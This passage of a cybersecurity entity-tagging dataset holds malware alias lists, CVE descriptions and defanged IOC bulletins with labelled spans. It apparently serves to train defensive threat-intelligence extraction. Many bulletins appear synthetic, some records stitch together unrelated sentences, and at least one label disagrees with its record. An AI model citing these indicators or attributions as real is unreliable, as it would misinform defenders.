The following versions contain the fix: Tuleap Community Edition 13[.]2[.]99[.]83, Tuleap Enterprise Edition 13.1-6, and Tuleap Enterprise Edition 13.2-4.", "spans": {"Vulnerability: CVE-2021-41276": [[150, 164]], "Indicator: 13.2.99.83": [[801, 817]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-43782"}} {"text": "A backdoor also known as: HW32.Packed.3E85 Backdoor.Win32.Nepoe!O Dropper.Paradrop.Win32.108 W32/Korgo.worm PE_AGOBOT.AQM Win32.Trojan.WisdomEyes.16070401.9500.9889 W32/Bobax.AO W32.Bleshare PE_AGOBOT.AQM Win.Trojan.Poebot-45 Trojan-Dropper.Win32.Paradrop.a Trojan.Win32.Paradrop.xhlx Dropper.Paradrop.180736 Troj.Dropper.W32.Paradrop.kYTK TrojWare.Win32.TrojanDropper.Paradrop.a0 Trojan.MulDrop.2267 BehavesLike[.]Win32[.]Conficker[.]cc Backdoor.Win32.PoeBot.C W32/Bobax.LVYX-1108 TrojanDropper.Paradrop TR/Drop.Paradro.a.3 Trojan[Backdoor]/Win32.Agobot TrojanDropper:Win32/Paradrop.J Trojan-Dropper.Win32.Paradrop.a W32/Polybot.dr Backdoor.PoeBot Trj/Droppofonic.A Win32/TrojanDropper.Paradrop.A Worm.PoeBot.S W32/Paradrop.B!tr.dr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Conficker.cc": [[401, 437]]}, "info": {"id": "cyner2_train_007109", "source": "defanged_augment"}} {"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 10[.]143[.]46[.]198\n- 192 [ . ] 114 [ . ] 71 [ . ] 131\n- 172 [ . ] 94 [ . ] 178 [ . ] 62\n- authnode[.]tech\n- storagemail[.]info\nURLs:\n- hxxp://storage-edge[ . ]dev/api/v2/auth\n- hxxp://updatecdn[ . ]dev/secure/token\nEmail Senders:\n- service@login-portal[.]tech\n- admin@login-portal[ . 
]tech\nFile Indicators:\n- SHA256: 13bc7078d254063e5d45ba0580bc85f008076b67c6dc5556a84e35cf2917687c\n- SHA1: f56ecda5823de4a73e2bb579c2a2d0be6f3b6125\n- Drop path: C:\\Users\\admin\\Downloads\\loader.exe", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 10.143.46.198": [[62, 81]], "Indicator: 192.114.71.131": [[84, 116]], "Indicator: 172.94.178.62": [[119, 150]], "Indicator: authnode.tech": [[153, 168]], "Indicator: storagemail.info": [[171, 189]], "Indicator: hxxp://storage-edge.dev/api/v2/auth": [[198, 237]], "Indicator: hxxp://updatecdn.dev/secure/token": [[240, 277]], "Indicator: service@login-portal.tech": [[295, 322]], "Indicator: admin@login-portal.tech": [[325, 352]], "Indicator: 13bc7078d254063e5d45ba0580bc85f008076b67c6dc5556a84e35cf2917687c": [[380, 444]], "Indicator: f56ecda5823de4a73e2bb579c2a2d0be6f3b6125": [[453, 493]]}, "info": {"id": "synth_v2_01481", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 W32/Virut.AI W32[ . ]Virut[ . 
]CF Win32/Virut.17408 PE_VIRUX.A-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.tt Virus.Win32.Virut.CE Trojan.MulDrop1.57199 PE_VIRUX.A-1 BehavesLike.Win32.Virut.dc W32/Virut.AI Win32/Virut.bn Trojan[Dropper]/Win32.Injector Win32.Virut.nc.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Win32/Virut.NBP IM-Worm.Win32.Zeroll W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[107, 127]]}, "info": {"id": "cyner2_train_007672", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data-race around unix_tot_inflight.\n\nunix_tot_inflight is changed under spin_lock(unix_gc_lock), but\nunix_release_sock() reads it locklessly.\n\nLet's use READ_ONCE() for unix_tot_inflight.\n\nNote that the writer side was marked by commit 9d6d7f1cb67c (\"af_unix:\nannote lockless accesses to unix_tot_inflight & gc_in_progress\")\n\nBUG: KCSAN: data-race in unix_inflight / unix_release_sock\n\nwrite (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1:\n unix_inflight+0x130/0x180 net/unix/scm.c:64\n unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123\n unix_scm_to_skb net/unix/af_unix.c:1832 [inline]\n unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x148/0x160 net/socket.c:747\n ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493\n ___sys_sendmsg+0xc6/0x140 net/socket.c:2547\n __sys_sendmsg+0x94/0x140 net/socket.c:2576\n __do_sys_sendmsg net/socket.c:2585 [inline]\n __se_sys_sendmsg net/socket.c:2583 [inline]\n __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nread to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0:\n unix_release_sock+0x608/0x910 net/unix/af_unix.c:671\n unix_release+0x59/0x80 
net/unix/af_unix.c:1058\n __sock_release+0x7d/0x170 net/socket.c:653\n sock_close+0x19/0x30 net/socket.c:1385\n __fput+0x179/0x5e0 fs/file_table.c:321\n ____fput+0x15/0x20 fs/file_table.c:349\n task_work_run+0x116/0x1a0 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:171 [inline]\n exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204\n __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline]\n syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297\n do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nvalue changed: 0x00000000 -> 0x00000001\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . ]org 04/01/2014", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[2273, 2333]], "System: Linux kernel": [[7, 19]], "System: systemd": [[2152, 2159]], "System: QEMU": [[2228, 2232]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54006"}} {"text": "A backdoor also known as: W32.Chiko.Worm Trojan/W32.StartPage.377856 Trojan.Win32.StartPage!O Worm.AutoRun W32.W.Fearso.kYUv WORM_SILLY.ICA Win32.Worm.Delf.cg W32.SillyFDC Win32/Chike.A Worm.Win32.AutoRun.ihn Trojan.Win32.StartPage.yqro Trojan.Win32.StartPage.377856 Trojan.StartPage.52501 Trojan.StartPage.Win32.1 Virus.Win32.Alman Trojan/StartPage[ . 
]de TR/Delf.AKP Trojan/Win32.StartPage Win32.Virut.ce.57344 Trojan.Heur.ED91C9 Worm.Win32.AutoRun.ihn Worm:Win32/Chiki.A HEUR/Fakon.mwf TScope.Trojan.Delf W32/Chike.C.worm Win32/Delf.NFT Win32.Worm.Autorun.Pavh Trojan.StartPage!orHv1sw9Olo W32/StartPage.AJH!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: StartPage.de": [[340, 356]]}, "info": {"id": "cyner2_train_006825", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan-Downloader.Dluca.by Trojan.Downloader.Dluca-29 Trojan-Downloader.Win32.Dluca.by TrojWare.Win32.TrojanDownloader.Dluca.~D3 Dialer.Adultparty Trojan-Downloader.Win32.Dluca.dj!IK TrojanDownloader[.]Dluca[.]bg TrojanDownloader:Win32/Dluca[ . ]DK Win-Trojan/Dluca.94208 Trojan-Downloader.Win32.Dluca.dj", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojanDownloader.Dluca.bg": [[215, 244]], "Indicator: Dluca.DK": [[268, 280]]}, "info": {"id": "cyner2_train_005863", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Europol identified a large-scale phishing operation. Emails originated from notification@auth-check[ . ]org and admin@credential-check[.]site, spoofing legitimate services. Victims were directed to hxxps://node-edge[.]site/login which hosted a credential harvesting page on cdn-edge[.]com. A secondary link hxxp://proxymail[ . ]link/login delivered Ryuk (SHA256: 7f93ffbeae05b3ff6a1b061cb08c17fb3b7c6aaf18f710cca8a8719cb1eb805d). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\config.dat and established C2 with 10 [ . ] 190 [ . ] 153 [ . 
] 226.", "spans": {"Organization: Europol": [[26, 33]], "Indicator: notification@auth-check.org": [[102, 133]], "Indicator: admin@credential-check.site": [[138, 167]], "Indicator: https://node-edge.site/login": [[224, 254]], "Indicator: cdn-edge.com": [[300, 314]], "Indicator: http://proxymail.link/login": [[333, 364]], "Malware: Ryuk": [[375, 379]], "Indicator: 7f93ffbeae05b3ff6a1b061cb08c17fb3b7c6aaf18f710cca8a8719cb1eb805d": [[389, 453]], "Indicator: 10.190.153.226": [[550, 582]]}, "info": {"id": "synth_v2_00945", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Certutil artifacts at C:\\ProgramData\\implant.so. Memory dump analysis confirmed execution of CrackMapExec. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\svchost.exe. Network forensics identified connections to 165[.]194[.]47[.]5 and loginauth[ . ]site. Email headers traced the initial vector to contact@urgent-notice[ . ]online. File C:\\Program Files\\Common Files\\taskhost.exe (SHA1: f2ced5a1df3a4e8769902d1282d536d987665292) was identified as the initial dropper. A staging URL hxxp://login-api[.]top/secure/token resolved to 192 [ . ] 67 [ . ] 81 [ . ] 171. Secondary artifact hash: SHA1: c55a95118f286de674c162d21b02f3df66e83873.", "spans": {"Indicator: 165.194.47.5": [[312, 330]], "Indicator: loginauth.site": [[335, 353]], "Indicator: contact@urgent-notice.online": [[398, 430]], "Indicator: f2ced5a1df3a4e8769902d1282d536d987665292": [[487, 527]], "Indicator: http://login-api.top/secure/token": [[582, 617]], "Indicator: 192.67.81.171": [[630, 661]], "Indicator: c55a95118f286de674c162d21b02f3df66e83873": [[694, 734]]}, "info": {"id": "synth_v2_01159", "source": "defanged_augment"}} {"text": "IOC Bulletin - Lumma Stealer Campaign:\nNetwork Indicators:\n- 54 [ . ] 181 [ . ] 56 [ . ] 236\n- 10[.]210[.]254[.]80\n- 28[.]117[.]219[.]59\n- mailstatic[.]com\n- updatesync[ . 
]net\nURLs:\n- hxxps://loginlogin[.]xyz/download/update.exe\n- hxxp://proxynode[ . ]link/login\nEmail Senders:\n- billing@account-update[ . ]xyz\n- billing@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 99030999623790fce84dc5fd55382d0e\n- SHA256: f63586a5751edf100a3839f82e5cb2fcb8e070e2d1a21fc0f63d1be9d1dbc0f8\n- Drop path: C:\\Users\\Public\\Documents\\payload.bin", "spans": {"Malware: Lumma Stealer": [[15, 28]], "Indicator: 54.181.56.236": [[61, 92]], "Indicator: 10.210.254.80": [[95, 114]], "Indicator: 28.117.219.59": [[117, 136]], "Indicator: mailstatic.com": [[139, 155]], "Indicator: updatesync.net": [[158, 176]], "Indicator: https://loginlogin.xyz/download/update.exe": [[185, 229]], "Indicator: http://proxynode.link/login": [[232, 263]], "Indicator: billing@account-update.xyz": [[281, 311]], "Indicator: billing@urgent-notice.online": [[314, 346]], "Indicator: 99030999623790fce84dc5fd55382d0e": [[371, 403]], "Indicator: f63586a5751edf100a3839f82e5cb2fcb8e070e2d1a21fc0f63d1be9d1dbc0f8": [[414, 478]]}, "info": {"id": "synth_v2_01390", "source": "defanged_augment"}} {"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the “ IndexOffice[ . ]exe ” artifact : if true then it will delete it and it will download a new file/script from “ hxxp://masseffect[.]space/_/post.php ” . 
To date , the ransomware has only been used in a limited fashion .", "spans": {"Organization: Unit 42": [[189, 196]], "Organization: financial organizations": [[324, 347]], "Indicator: IndexOffice.exe": [[414, 432]], "Indicator: http://masseffect.space/_/post.php": [[522, 581]], "Malware: ransomware": [[600, 610]]}, "info": {"id": "cyberner_stix_train_004264", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.HfsAutoB.4D03 Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9639 Trojan.Win32.TPM.eslggg BehavesLike[.]Win32[.]PWSZbot[.]cc Trojan.Heur.RP.ZyWaayyb2wki Trojan.Win32.Z.Ircbot.839168.A Win32.Trojan.Crypt.Hqux Trojan.Themida! Trojan-PWS.OnlineGames Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[132, 166]]}, "info": {"id": "cyner2_train_006791", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed SharpHound artifacts at /var/tmp/shell.php. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via C:\\Windows\\System32\\config.dat. Network forensics identified connections to 10[.]166[.]205[.]247 and securenode[ . ]online. Email headers traced the initial vector to info@mail-service[ . ]info. File C:\\Users\\Public\\Documents\\helper.sh (SHA256: b7f0f4cf45fca295d1ade884e5f7db5157b3f2dd093337305f1a8340b7ab6f1f) was identified as the initial dropper. A staging URL hxxp://backup-cache[.]tech/download/update.exe resolved to 54[.]67[.]241[.]145. 
Secondary artifact hash: MD5: 199d4e83864eb06462efbd89a5951e57.", "spans": {"Indicator: 10.166.205.247": [[296, 316]], "Indicator: securenode.online": [[321, 342]], "Indicator: info@mail-service.info": [[387, 413]], "Indicator: b7f0f4cf45fca295d1ade884e5f7db5157b3f2dd093337305f1a8340b7ab6f1f": [[465, 529]], "Indicator: http://backup-cache.tech/download/update.exe": [[584, 630]], "Indicator: 54.67.241.145": [[643, 662]], "Indicator: 199d4e83864eb06462efbd89a5951e57": [[694, 726]]}, "info": {"id": "synth_v2_01200", "source": "defanged_augment"}} {"text": "] addroider[.]com ’ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"Organization: banks": [[157, 162]], "Organization: government organizations": [[238, 262]], "Indicator: addroider.com": [[2, 17]]}, "info": {"id": "cyberner_stix_train_000870", "source": "defanged_augment"}} {"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . 
During the analysis , we also noticed the “ veter1605_MAPS_10cr0[.]exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"Malware: XLoader": [[29, 36], [106, 113]], "Malware: nbtscan": [[207, 214]], "Malware: powercat": [[219, 227]], "Indicator: veter1605_MAPS_10cr0.exe": [[350, 376]]}, "info": {"id": "cyberner_stix_train_000274", "source": "defanged_augment"}} {"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN . APT33 : 91[.]230[.]121[.]143 backupnet[.]ddns[.]net . The ads are very similar to other brand impersonation campaigns .", "spans": {"Organization: Lookout": [[17, 24]], "Organization: U.S. Government": [[165, 180]], "Organization: DHS": [[192, 195]], "Organization: FBI": [[200, 203]], "Indicator: 91.230.121.143": [[314, 334]], "Indicator: backupnet.ddns.net": [[335, 357]]}, "info": {"id": "cyberner_stix_train_000255", "source": "defanged_augment"}} {"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the “ Loveusd[ . ]sys ” extracted driver name to the upper filter list . 
In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"Indicator: Loveusd.sys": [[317, 332]], "System: Remote PowerShell service": [[451, 476]]}, "info": {"id": "cyberner_stix_train_007584", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 181 [ . ] 4 [ . ] 26, the Trend Micro IR team identified AgentTesla running as /usr/local/bin/helper.sh. The threat actor, believed to be Kimsuky, used Mimikatz for credential harvesting and Chisel for lateral movement. Exfiltrated data was sent to gateway-auth[.]dev and updatelogin[.]link. The initial dropper (MD5: 3e7d0838083d5cab37c16c16bacd01fe) was delivered via a phishing email from it@identity-verify[ . ]cc. A second C2 node was observed at 126[.]101[.]43[.]136, with a persistence mechanism writing to /dev/shm/lsass.dmp.", "spans": {"Indicator: 172.181.4.26": [[64, 94]], "Organization: Trend Micro": [[100, 111]], "Malware: AgentTesla": [[131, 141]], "Indicator: gateway-auth.dev": [[323, 341]], "Indicator: updatelogin.link": [[346, 364]], "Indicator: 3e7d0838083d5cab37c16c16bacd01fe": [[392, 424]], "Indicator: it@identity-verify.cc": [[466, 491]], "Indicator: 126.101.43.136": [[526, 546]]}, "info": {"id": "synth_v2_00347", "source": "defanged_augment"}} {"text": "Zscaler ThreatLabz detected a multi-stage attack chain. The initial phishing email from contact@document-share[ . ]link contained a link to hxxps://syncbackup[.]tech/download/update.exe. This redirected to hxxp://portallogin[ . ]org/login on node-cdn[.]online. A secondary email from notification@login-portal[ . ]tech pointed to hxxps://sync-gateway[ . ]live/admin/config which delivered Raccoon Stealer. The final payload callback was hxxp://logincache[.]cc/api/v2/auth resolving to 88 [ . ] 38 [ . ] 18 [ . ] 244 via edge-portal[ . 
]com.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Indicator: contact@document-share.link": [[88, 119]], "Indicator: hxxps://syncbackup.tech/download/update.exe": [[140, 185]], "Indicator: hxxp://portallogin.org/login": [[206, 238]], "Indicator: node-cdn.online": [[242, 259]], "Indicator: notification@login-portal.tech": [[284, 318]], "Indicator: https://sync-gateway.live/admin/config": [[330, 372]], "Malware: Raccoon Stealer": [[389, 404]], "Indicator: http://logincache.cc/api/v2/auth": [[437, 471]], "Indicator: 88.38.18.244": [[485, 515]], "Indicator: edge-portal.com": [[520, 539]]}, "info": {"id": "synth_v2_01706", "source": "defanged_augment"}} {"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor[.]Sogu .", "spans": {"Indicator: Backdoor.Sogu": [[91, 106]]}, "info": {"id": "cyberner_stix_train_008007", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Halk!O Backdoor.CIA BKDR_NERTE.780 Backdoor.Win32.NerTe.780 Backdoor.Win32.Nerte_780.Inst[h] Backdoor.Win32.NerTe.780 Trojan.MulDrop.1253 BKDR_NERTE.780 W32/Risk.YHOK-6554 BDS/Nerte78.Inst Win32.Hack.NerteZip.kcloud Backdoor:Win32/Nerte.7_80.dr Bck/Iroffer[ . ]BG Win32/NerTe.78.Client W32/NerTe.V780!tr.bdr BackDoor.Nerte Backdoor.Win32.NerTe.ajn", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[296, 310]]}, "info": {"id": "cyner2_train_004383", "source": "defanged_augment"}} {"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . Asala[ . 
]mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"Organization: government": [[268, 278]], "Organization: technology related companies": [[282, 310]], "Indicator: Asala.mp3": [[331, 344]], "Organization: Talos": [[367, 372]]}, "info": {"id": "cyberner_stix_train_000968", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Conti (SHA1: 8648cd3dacd28a83b0e1afdb62c16f0b8026ef55). Upon execution on Zyxel USG, the sample creates /usr/local/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 106[.]173[.]72[.]234 every 60 seconds and DNS queries to proxy-cloud[.]info. The second stage was fetched from hxxp://storage-api[.]online/wp-content/uploads/doc.php and written to /home/user/.config/sam.hive. The payload uses Hashcat-style techniques for defense evasion. A secondary hash (SHA256: 2526e71c692da3557d475d25f097fd45d9c24627b166b9d4cfedf1c513536d4e) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: 8648cd3dacd28a83b0e1afdb62c16f0b8026ef55": [[38, 78]], "System: Zyxel USG": [[99, 108]], "Indicator: 106.173.72.234": [[232, 252]], "Indicator: proxy-cloud.info": [[289, 307]], "Indicator: http://storage-api.online/wp-content/uploads/doc.php": [[343, 397]], "Indicator: 2526e71c692da3557d475d25f097fd45d9c24627b166b9d4cfedf1c513536d4e": [[531, 595]]}, "info": {"id": "synth_v2_00474", "source": "defanged_augment"}} {"text": "Blog Post by Trend Micro: Tracking Diamond Sleet's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-39439 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from confirm@document-share[.]link delivering BumbleBee. Post-compromise, the attackers deploy Cobalt Strike and use BloodHound for reconnaissance. C2 infrastructure includes 219 [ . ] 204 [ . ] 66 [ . 
] 168 and backupsecure[ . ]link. A staging server at hxxp://storage-secure[.]live/secure/token hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\runtime.dll (SHA1: ed4c6da0cf4152d9984c870e854a576211a58938).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2021-39439": [[128, 142]], "System: F5 BIG-IP": [[151, 160]], "Indicator: confirm@document-share.link": [[236, 265]], "Malware: BumbleBee": [[277, 286]], "Malware: Cobalt Strike": [[326, 339]], "Indicator: 219.204.66.168": [[406, 438]], "Indicator: backupsecure.link": [[443, 464]], "Indicator: hxxp://storage-secure.live/secure/token": [[486, 527]], "Indicator: ed4c6da0cf4152d9984c870e854a576211a58938": [[604, 644]]}, "info": {"id": "synth_v2_01670", "source": "defanged_augment"}} {"text": "IOC Bulletin - Gootloader Campaign:\nNetwork Indicators:\n- 164[.]55[.]7[.]74\n- 193[.]251[.]126[.]184\n- 108 [ . ] 222 [ . ] 153 [ . ] 66\n- clouddata[.]io\n- edgecdn[ . ]club\nURLs:\n- hxxps://node-cache[ . ]com/callback\n- hxxp://mailapi[.]io/gate.php\nEmail Senders:\n- confirm@mail-service[.]info\n- updates@credential-check[ . 
]site\nFile Indicators:\n- SHA1: 72096980728e719a33d326425eb34856c89226c0\n- MD5: dcb49797c751598ca0edbdaccb3279cd\n- Drop path: C:\\ProgramData\\shell.php", "spans": {"Malware: Gootloader": [[15, 25]], "Indicator: 164.55.7.74": [[58, 75]], "Indicator: 193.251.126.184": [[78, 99]], "Indicator: 108.222.153.66": [[102, 134]], "Indicator: clouddata.io": [[137, 151]], "Indicator: edgecdn.club": [[154, 170]], "Indicator: https://node-cache.com/callback": [[179, 214]], "Indicator: hxxp://mailapi.io/gate.php": [[217, 245]], "Indicator: confirm@mail-service.info": [[263, 290]], "Indicator: updates@credential-check.site": [[293, 326]], "Indicator: 72096980728e719a33d326425eb34856c89226c0": [[352, 392]], "Indicator: dcb49797c751598ca0edbdaccb3279cd": [[400, 432]]}, "info": {"id": "synth_v2_01322", "source": "defanged_augment"}} {"text": "snappy-java is a fast compressor/decompressor for Java. Due to unchecked multiplications, an integer overflow may occur in versions prior to 1 [ . ] 1 [ . ] 10 [ . ] 1, causing an unrecoverable fatal error.\n\nThe function `compress(char[] input)` in the file `Snappy.java` receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the rawCompress` function.\n\nSince the length is not tested, the multiplication by two can cause an integer overflow and become negative. The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array.\n\nSince the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a `java.lang.NegativeArraySizeException` exception will be raised while trying to allocate the array `buf`. 
On the other side, if the result is positive, the `buf` array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error.\n\nThe same issue exists also when using the `compress` functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.\n\nVersion 1 [ . ] 1 [ . ] 10 [ . ] 1 contains a patch for this issue.", "spans": {"Indicator: 1.1.10.1": [[141, 167], [1586, 1612]], "System: Java": [[50, 54], [887, 891]], "Vulnerability: integer overflow": [[93, 109], [482, 498]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-34454"}} {"text": "Krybit is a ransomware group that operates as a ransomware-as-a-service provider, offering affiliates 80% of ransom proceeds in exchange for technical support and a malware suite. The group has claimed attacks on various organizations across multiple countries, including asesoriauriel[ . ]com in Spain and fraper[ . ]com in Spain, without disclosing the volume of data exfiltrated. Krybit is currently engaged in a turf war with another group, 0APT, and has been accused of fabricating victim claims. Their leak site has been used to publish compromised data and to issue threats to rivals and victims alike.", "spans": {"Indicator: asesoriauriel.com": [[272, 293]], "Indicator: fraper.com": [[307, 321]]}, "info": {"source": "defanged_augment", "name": "Krybit"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: fix hugetlb vs. core-mm PT locking\n\nWe recently made GUP's common page table walking code to also walk hugetlb\nVMAs without most hugetlb special-casing, preparing for the future of\nhaving less hugetlb-specific page table walking code in the codebase. 
\nTurns out that we missed one page table locking detail: page table locking\nfor hugetlb folios that are not mapped using a single PMD/PUD.\n\nAssume we have hugetlb folio that spans multiple PTEs (e.g., 64 KiB\nhugetlb folios on arm64 with 4 KiB base page size). GUP, as it walks the\npage tables, will perform a pte_offset_map_lock() to grab the PTE table\nlock.\n\nHowever, hugetlb that concurrently modifies these page tables would\nactually grab the mm->page_table_lock: with USE_SPLIT_PTE_PTLOCKS, the\nlocks would differ. Something similar can happen right now with hugetlb\nfolios that span multiple PMDs when USE_SPLIT_PMD_PTLOCKS.\n\nThis issue can be reproduced [1], for example triggering:\n\n[ 3105.936100] ------------[ cut here ]------------\n[ 3105.939323] WARNING: CPU: 31 PID: 2732 at mm/gup.c:142 try_grab_folio+0x11c/0x188\n[ 3105.944634] Modules linked in: [...]\n[ 3105.974841] CPU: 31 PID: 2732 Comm: reproducer Not tainted 6.10.0-64.eln141.aarch64 #1\n[ 3105.980406] Hardware name: QEMU KVM Virtual Machine, BIOS edk2-20240524-4.fc40 05/24/2024\n[ 3105.986185] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 3105.991108] pc : try_grab_folio+0x11c/0x188\n[ 3105.994013] lr : follow_page_pte+0xd8/0x430\n[ 3105.996986] sp : ffff80008eafb8f0\n[ 3105.999346] x29: ffff80008eafb900 x28: ffffffe8d481f380 x27: 00f80001207cff43\n[ 3106.004414] x26: 0000000000000001 x25: 0000000000000000 x24: ffff80008eafba48\n[ 3106.009520] x23: 0000ffff9372f000 x22: ffff7a54459e2000 x21: ffff7a546c1aa978\n[ 3106.014529] x20: ffffffe8d481f3c0 x19: 0000000000610041 x18: 0000000000000001\n[ 3106.019506] x17: 0000000000000001 x16: ffffffffffffffff x15: 0000000000000000\n[ 3106.024494] x14: ffffb85477fdfe08 x13: 0000ffff9372ffff x12: 0000000000000000\n[ 3106.029469] x11: 1fffef4a88a96be1 x10: ffff7a54454b5f0c x9 : ffffb854771b12f0\n[ 3106.034324] x8 : 0008000000000000 x7 : ffff7a546c1aa980 x6 : 0008000000000080\n[ 3106.038902] x5 : 00000000001207cf x4 : 0000ffff9372f000 
x3 : ffffffe8d481f000\n[ 3106.043420] x2 : 0000000000610041 x1 : 0000000000000001 x0 : 0000000000000000\n[ 3106.047957] Call trace:\n[ 3106.049522] try_grab_folio+0x11c/0x188\n[ 3106.051996] follow_pmd_mask.constprop.0.isra.0+0x150/0x2e0\n[ 3106.055527] follow_page_mask+0x1a0/0x2b8\n[ 3106.058118] __get_user_pages+0xf0/0x348\n[ 3106.060647] faultin_page_range+0xb0/0x360\n[ 3106.063651] do_madvise+0x340/0x598\n\nLet's make huge_pte_lockptr() effectively use the same PT locks as any\ncore-mm page table walker would. Add ptep_lockptr() to obtain the PTE\npage table lock using a pte pointer -- unfortunately we cannot convert\npte_lockptr() because virt_to_page() doesn't work with kmap'ed page tables\nwe can have with CONFIG_HIGHPTE.\n\nHandle CONFIG_PGTABLE_LEVELS correctly by checking in reverse order, such\nthat when e.g., CONFIG_PGTABLE_LEVELS==2 with\nPGDIR_SIZE==P4D_SIZE==PUD_SIZE==PMD_SIZE will work as expected. Document\nwhy that works.\n\nThere is one ugly case: powerpc 8xx, whereby we have an 8 MiB hugetlb\nfolio being mapped using two PTE page tables. While hugetlb wants to take\nthe PMD table lock, core-mm would grab the PTE table lock of one of both\nPTE page tables. In such corner cases, we have to make sure that both\nlocks match, which is (fortunately!) currently guaranteed for 8xx as 